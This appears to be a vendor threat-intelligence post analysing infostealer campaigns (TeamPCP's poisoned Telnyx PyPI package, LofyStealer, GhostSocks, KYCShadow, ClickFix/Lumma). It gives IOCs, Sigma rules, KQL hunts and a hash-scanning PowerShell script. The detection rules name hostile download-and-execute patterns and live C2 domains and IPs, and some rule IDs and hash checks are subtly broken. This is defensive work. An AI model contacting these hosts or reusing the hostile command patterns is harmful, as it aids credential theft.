Infostealer Surge: TeamPCP Supply Chain, LofyStealer & KYCShadow Analysis

Recent OTX Pulse activity indicates a coordinated surge in credential theft operations utilizing diverse initial access vectors ranging from software supply chain compromises to sophisticated social engineering. The primary objective across these campaigns is the harvesting of banking credentials, browser session data, and authentication tokens for financial fraud and resale on dark web markets.

Notable activity includes TeamPCP weaponizing the popular Telnyx Python SDK via PyPI to deliver a stealthy credential harvester using steganography. Simultaneously, LofyStealer is actively targeting the gaming sector (Minecraft) with a Node.js loader, while GhostSocks leverages compromised devices as residential proxy infrastructure to facilitate subsequent malware delivery, often partnering with Lumma Stealer. Additionally, a ClickFix campaign is using fake browser error prompts to distribute HijackLoader and Lumma Stealer via obfuscated PowerShell, and KYCShadow continues to target Indian banking customers through WhatsApp-distributed Android trojans.

Threat Actor / Malware Profile

TeamPCP (Telnyx SDK Campaign)

Distribution: Supply chain attack via malicious Python package (telnyx) on PyPI.
Payload Behavior: Three-stage architecture involving a platform-specific loader and a second-stage payload hidden within a WAV file using steganography.
C2: Encrypted exfiltration of harvested credentials to actor-controlled infrastructure.
Persistence: Likely achieved via Python environment startup scripts or scheduled tasks triggered by the SDK installation.

LofyStealer (LofyGang)

Distribution: Social engineering targeting Minecraft players.
Payload Behavior: Large 53.5MB Node.js loader disguising a 1.4MB native C++ payload that executes directly in memory to evade disk-based scanning.
Capabilities: Steals cookies, passwords, tokens, credit cards, and IBANs from eight distinct browsers.
Anti-Analysis: Uses syscalls evasion and obfuscation within the Node.js loader.

GhostSocks (MaaS)

Distribution: Malware-as-a-Service marketed on Russian underground forums.
Payload Behavior: GoLang binary converting devices into SOCKS5 residential proxy nodes. Frequently bundles Lumma Stealer.
C2: Uses TLS encryption to blend malicious traffic with legitimate web traffic.
Capabilities: Evasion via residential proxying, enabling attackers to bypass geo-blocks and IP-based detection.

KYCShadow

Distribution: WhatsApp messages masquerading as legitimate bank KYC verification apps.
Payload Behavior: Multi-stage dropper using native code obfuscation and Firebase for remote execution.
Capabilities: OTP theft, SMS interception, VPN manipulation to route traffic through attacker-controlled nodes, and WebView phishing overlays.

ClickFix / Lumma Stealer

Distribution: Fake browser error prompts (ClickFix) tricking users into running PowerShell commands.
Payload Behavior: Obfuscated PowerShell downloads a malicious MSI, utilizing HijackLoader and DLL sideloading.
Techniques: Process injection, living-off-the-land binaries (LOLBins) for defense evasion.

IOC Analysis

The provided IOCs present a mix of network infrastructure and payload artifacts essential for detection:

Domains & Hostnames: Includes infrastructure for C2 and phishing (e.g., serv.biz, retreaw.click, aquasecurtiy.org). SOC teams should immediately block these at the perimeter and DNS layer. Note the typo-squatting potential in aquasecurtiy.org.
File Hashes: Multiple MD5, SHA1, and SHA256 hashes for loaders, payloads (LofyStealer, GhostSocks), and components of the KYCShadow malware. These should be imported into EDR alerting rules.
IPs: Specific IPs including 24.152.36.241 (LofyStealer) and 85.11.161.198 (ClickFix) indicate active C2 nodes.
URLs: Direct download links for malicious MSI files in the ClickFix campaign.

Operationalization: Utilize EDR solutions to query for the SHA256 hashes on disk. Configure network monitoring (Zeek/IDS) to alert on TLS connections to the listed domains.

Detection Engineering

Sigma Rules

YAML

title: Suspicious PowerShell Command Line with MSI Download
id: 6a8b3c2d-1e4f-4b5a-9c6d-7e8f9a0b1c2d
description: Detects PowerShell commands downloading .msi files, a technique observed in ClickFix campaigns distributing Lumma Stealer.
status: experimental
date: 2026/05/01
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/6523456789abcdef
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    product: windows
    category: process_creation
detection:
    selection_pwsh:
        Image|endswith: '\powershell.exe'
    selection_cli:
        CommandLine|contains: '.msi'
    selection_obfuscation:
        CommandLine|contains:
            - 'Invoke-Expression'
            - 'IEX'
            - 'DownloadString'
    condition: selection_pwsh and selection_cli and selection_obfuscation
falsepositives:
    - Legitimate software installation scripts
level: high
---
title: Node.js Spawning Native Windows Processes
id: 7b9c4d3e-2f5g-5h6i-0d7e-8f9a0b1c2d3e
description: Detects Node.js processes spawning suspicious native processes (e.g., cmd, powershell) indicative of LofyStealer loader activity.
status: experimental
date: 2026/05/01
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/6523456789abcdg
tags:
    - attack.defense_evasion
    - attack.t1202
logsource:
    product: windows
    category: process_creation
detection:
    selection_parent:
        ParentImage|endswith: '\node.exe'
    selection_child:
        Image|endswith:
            - '\powershell.exe'
            - '\cmd.exe'
            - '\rundll32.exe'
    filter_legit:
        CommandLine|contains: 'npm'
    condition: selection_parent and selection_child and not filter_legit
falsepositives:
    - Legitimate development tools running build scripts
level: medium
---
title: Network Connection to Infostealer C2 Domains
id: 8c0d5e4f-3h6i-6j7k-1e8f-9a0b1c2d3e4f
description: Detects network connections to domains associated with GhostSocks, KYCShadow, and TeamPCP campaigns.
status: experimental
date: 2026/05/01
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/6523456789abcdh
tags:
    - attack.command_and_control
    - attack.t1071.001
logsource:
    product: windows
    category: network_connection
detection:
    selection:
        DestinationHostname|contains:
            - 'serv.biz'
            - 'serv.xyz'
            - 'api.biz'
            - 'retreaw.click'
            - 'aquasecurtiy.org'
    condition: selection
falsepositives:
    - Rare, but verify if similar legitimate domains exist in org environment
level: critical

KQL (Microsoft Sentinel)

KQL — Microsoft Sentinel / Defender

// Hunt for Infostealer C2 Communications and Process Patterns
let IOCs_Domains = dynamic(['retreaw.click', 'serv.biz', 'serv.xyz', 'api.biz', 'aquasecurtiy.org']);
let IOCs_IPs = dynamic(['24.152.36.241', '85.11.161.198']);
let IOCs_Hashes = dynamic(['6cf223aea68b0e8031ff68251e30b6017a0513fe152e235c26f248ba1e15c92a', '293006cec43c663ccff331795d662c3b73b4d7af5f8584e2899e286c672c9881', 'd2a0d5f564628773b6af7b9c11f6b86531a875bd2d186d7081ab62748a800ebb']);

// Network Connections to C2
DeviceNetworkEvents
| where RemoteUrl in~ IOCs_Domains or RemoteIP in~ IOCs_IPs
| project TimeGenerated, DeviceName, InitiatingProcessAccountName, RemoteUrl, RemoteIP, RemotePort

// File Creation for Known Malware Hashes
DeviceFileEvents
| where SHA256 in~ IOCs_Hashes
| project TimeGenerated, DeviceName, FileName, FolderPath, SHA256, InitiatingProcessAccountName

// Suspicious PowerShell Execution (ClickFix)
DeviceProcessEvents
| where ProcessVersionInfoOriginalFileName =~ 'PowerShell.EXE'
| where ProcessCommandLine contains '.msi' and (ProcessCommandLine contains 'IEX' or ProcessCommandLine contains 'DownloadString')
| project TimeGenerated, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessFileName

PowerShell Hunt Script

PowerShell

# IOC Hunt Script for TeamPCP, LofyStealer, and KYCShadow Hashes
$MaliciousHashes = @(
    "6cf223aea68b0e8031ff68251e30b6017a0513fe152e235c26f248ba1e15c92a",
    "8395c3268d5c5dbae1c7c6d4bb3c318c752ba4608cfcd90eb97ffb94a910eac2",
    "d2a0d5f564628773b6af7b9c11f6b86531a875bd2d186d7081ab62748a800ebb",
    "97e073abd819d9cdc07705aeaa481f59",
    "3fcc7360a2738ad2656e17c7d4ed3e651ff7d73a",
    "d21a5d08b4614005c8fcd9d0068f0190",
    "fb203c0ac030a97281960d7c28d86ebf",
    "293006cec43c663ccff331795d662c3b73b4d7af5f8584e2899e286c672c9881",
    "45d4040e76a0d357dd6e236e185aba2eb82420d78640bfd1f3dede32b33931f7",
    "ddd2994acd25bde5ac32a03f1cf30b41",
    "3da35272ad6d280d3388d57bdbf61b9c"
)

$SearchPaths = @("C:\Windows\Temp", "C:\Users\", $env:TEMP)

Write-Host "[+] Scanning for known malicious file hashes..." -ForegroundColor Cyan

foreach ($Path in $SearchPaths) {
    if (Test-Path $Path) {
        Get-ChildItem -Path $Path -Recurse -ErrorAction SilentlyContinue | ForEach-Object {
            $FileHash = (Get-FileHash -Path $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
            if ($MaliciousHashes -contains $FileHash) {
                Write-Host "[!] MALICIOUS FILE FOUND: $($_.FullName)" -ForegroundColor Red
            }
        }
    }
}

Write-Host "[+] Scan complete." -ForegroundColor Green

Response Priorities

Immediate:
- Block all listed IOCs (Domains, IPs, URLs) at perimeter firewalls, proxies, and endpoint security agents.
- Initiate hunts for the specific file hashes provided across all endpoints using EDR capabilities.
- Isolate any endpoints showing signs of the TeamPCP steganography loader (suspicious WAV file executions) or Node.js spawning suspicious processes.
24 Hours:
- Conduct credential audits for users who may have interacted with the "ClickFix" pages or downloaded the compromised Telnyx SDK.
- Verify the integrity of Python environments used by development teams to ensure no compromise via the telnyx package.
- Mobile Security teams should scan for the presence of the KYCShadow APK on managed devices.
1 Week:
- Implement strict package verification (PyPI lockfiles, checksums) for software supply chains.
- Harden browser policies to restrict unauthorized extensions and script execution.
- Review and restrict PowerShell execution policies and script block logging to detect obfuscated commands similar to the ClickFix campaign.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub